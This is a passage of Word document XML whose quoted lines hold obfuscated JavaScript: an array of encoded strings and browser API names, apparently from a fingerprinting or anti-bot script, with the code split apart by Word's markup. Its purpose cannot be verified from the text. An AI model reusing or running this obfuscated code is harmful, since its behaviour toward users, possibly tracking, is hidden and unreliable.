        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561C817" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Uint8Array === "function" ? Uint8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Array :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23460D39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var y = [RQ, RV, Re, RY, Rz, Rn, RL, RW, RR, U, p, u, w, a, X, k, J, c, b, RM, RB, t, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, RN, O, r, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="517608A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6jdpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", "Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "g6I", "i_191RyUqk_AlkNsao_pRA-MxabmX8YZqSRYaI_wTNNJEtfg6t3bvU72ZfEZUz8ytaAph4Zi4TtDkn9-", "E3qPBPpZVbl_I-XR3wpS5aUiSxBE2HKmLJCG2G9YvmDQyXJ7MUFaBYZ7tniJy5HhHUSqUVKXF8LqLZWdN9UxKZ0JeCbjoaok0YeC22Gs22JD21Fr3GUj5XMqkYp7SBlFtEoJpRsCbw7RhoUSfuyNCnLg9p7KlvyDs2hVXVoRNEOhp6Jfemm9xUS_kkgRE9fnAE7JVVYSGALdzyEmfQPyuLnc9regY9QOPIUa_a-qYXHTuOm-UhN24VurAMLUfZwGcTlLd83n-4QBzzNm3Db6trclnjmQ3tretl95EajwlD8H35lME4-pCiBT3i35UIu8pss", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GFipKNlrFIRvEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ceil", "CSS", "yctLije8gC3H", "B0rqAbwNJ_dDEcvN7B93_rEWBH8e", "2L4ThUzJ5XSYpiU", "ZX2nFcJwMA", "action", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SyaMZtVyDfQBdKQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HlLeH_Q2", "Kesnoz3g8k3FpQQ9", "6_c", "pd4LuWvKhxTEpgc", "7iTRE6xxBddfOOOu", "sPVR6SOgknGhgA", "7fg", "fjzya_01MJkRa9X_", "Int32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SBDtRKMSRNNSeOzDxg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasOwnProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mL8sh03E4062lCwuK4rfFn3IquGvG4I", "1S65F9FBaQ", "vD_2KJkhD8sLZpe-", "cn7sYIQkQsdUE5iavg", "[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]--", "jyPZSaocE_E-UuH_yiNHybI0d0dBz1H6Kpb7kDg4qiM", "KzafEuBXFq4nb-2vhRVR9u8n", "q-QFx0TO", "9PJTujPk", "TiyaKZ0qb-JlGa674g", "EDW9TpxKAeNaAA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "443", "get", "lbECiFqZ3QXQwWIoCte6PTik", "F8Iewk7TszvT60QgEvXPLH0", "Z9kj5kTq7xbfiRpXeLajSxOUrPfXLPhzsGArHMS8eb5ZNL3Q0Nvmuno", "GEKcTPV2Ho9uaQ", "7QjtEqwGNPo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>toLowerCase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>","from-page-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1zC6WOVFM7EXQ5ee", "qTbXbbYySOlDSOfRvA9wheY5UgoyzR7U", "YsECpHeT6g", "r4A06ln17zW-gh9L", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifsoiEQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "oiD5csQFBKo", "WjKUUeRILKY3daLp0CIO4qEOZkpvxEe8Ytes-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1Vl71iezicXV3wYHI4upiCN58XFHhS1NB2Ub-u8eraLDtVmdw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTzSeKY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HWvxH6k4EOVVSw", "KzO6RvxXZakpNb2_qXx4xP1ceA", "CIJ1mwLd11SxlWsOKQ", "Document", "5sNu5gKywHLo6mYxd9SOOGXv77fTL6wl8A", "CIJPyT6_ow", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FCS7RfF2c_kf", "ydBfsSq1g2ropXoiUsSAMFGijceIIuQ4mwcKR43MIelCWcGUwduUinyXAP4oXw0srpEyj_JcnUE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vvoNn3Lg1w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8Tu-fo9KCZ0JTsqzijB925AvNjxIu0yBStPJiGE2", "URL", "EZI04A7a", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sIhhvwbV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Error", "sFKNAMlIXLlDMLa4mQ", "HKgD1Q793GGJtmISLKmFKwjl98w", "Mt1NqAylvXU", "assign", "S5UH62HIwQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JcoYhgqgzHjzmzM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Hel$&amp;?6%){</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>+#@\uD83D\uDC7A", "OYZu-Cu5qg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClPgFbEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZkT6R70vKd5eTenxyx0237QMeBRjzVPKL7_d-QE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rcsY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFfNDqAdDrFmb_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Object", "feVuiimeuXe43Q", "G1HsVIQgJ_5A", "\u26CE", "NjvUYKlMOf1vaevY32h07_oGGEhGuWu5c9H07H9MrCLv5iU", "sQKXP4lK", "multipart\x2Fform-data", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getPrototypeOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "document", "U8565RL880jOgEddOf6oEgaBvPqxKowUkGFSNLDuCJY0fJqumYri6iKJCdJ6ADMe8b5c7LQ68BgNmg", "M5Vs2RKP7GSzx0NhF-A", "5RWXS-l3XPcQI5nBkCc", "gdlV1zqIw2Hrq2RmGg", "([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})", "parse", "\uD800\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDFFF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uAOjLYBIAoMIQcrI2G86ncVXLSEssRvWSfStojN8ylj1s0lREBZ_d7EZ0ljlqPiEYBvLdS_zd6jbF6w", "hi3mMrInQM8gEZ3Y_xw6", "oHjeG64CFOlGY-iN2m9YsOZ-NhEtgDPvJJ_qpzFft16I2jkfRDZSRppKpHHWuIe-Zkvzb0HbFb3nLsHSU55scqF8WCXy770-05o", "iMN0-2eJlBA", "v4Y", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XrRxng_P</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "WAXPAJMFSfY4O-rW1i5b_roj", "Q1fWbbs5AdFnIOjO9iBT464", "WagxmkXM7QK0uFcpbeO1AW-JtNyvHoE38GNTYQ", "n-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NNyWOKkAnFjmck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vMFwySexlg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "_u97pk6Z5A69xENYSZz_GByQ", "8Ps", "k7pD0TKLgSKooTlKSK4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>djinPthydckqFQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "11GBROZIP7FWZ--mgnlas_lsLxIzlCXsOofzoxoHtgDXknNGGTFNXoNY-i6e7t7jYlftaB-EXeu-c8TAV4x1Yf8i", "EEXNTOpUPNB2KPKqhg4S7IQ", "qINh72e5gQ", "zBiUUeRIXqMbO_C9lGJcrtJ_KVsriTLsO5T_6ggZqg_imxJSDB8KRJUT_HbBsZ-nVFW5dFTKSva2XKSDHd41AfY6Hnqlr_0uzw", "chL6V-8CC-0kCA", "2Vg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PyeY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "filename", "s172fp5sYoRTGQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelectorAll</w:t>
